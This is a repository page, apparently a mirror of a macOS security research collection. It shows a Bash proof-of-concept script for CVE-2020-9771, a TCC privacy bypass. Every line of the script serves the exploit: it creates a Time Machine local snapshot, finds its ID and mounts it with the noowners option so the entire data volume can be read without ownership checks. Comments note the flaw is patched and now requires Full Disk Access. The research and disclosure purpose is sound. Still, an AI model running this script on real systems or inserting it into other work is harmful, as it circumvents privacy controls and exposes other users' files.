CalvinBackup/SnakeAppleSecurityFiles
1
0
Fork 0
mirror of https://github.com/Karmaz95/Snake_Apple.git synced 2026-03-30 14:00:16 +02:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
SnakeAppleSecurityFiles/IX. TCC/custom/FDA_mount_apfs.sh

19 lines
690 B
Bash
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
#!/bin/bash
# PoC: CVE-2020-9771 TCC Bypass It was patched by TCC Full Disk Access (FDA).
# Still, Terminal with FDA can read the contents of the whole system.
# https://theevilbit.github.io/posts/cve_2020_9771/
# Create a new local snapshot
tmutil localsnapshot
# Automatically retrieve the latest snapshot ID
SNAPSHOT_ID=$(tmutil listlocalsnapshots / | grep 'com.apple.TimeMachine' | tail -n 1 | awk '{print $NF}')
# Define the mount point (create if it doesn't exist)
MOUNT_DIR="/tmp/POC"
mkdir -p "$MOUNT_DIR"
# Mount the latest snapshot with noowners option
/sbin/mount_apfs -o noowners -s "$SNAPSHOT_ID" /System/Volumes/Data "$MOUNT_DIR"
echo "Snapshot mounted at $MOUNT_DIR"
Reference in New Issue View Git Blame Copy Permalink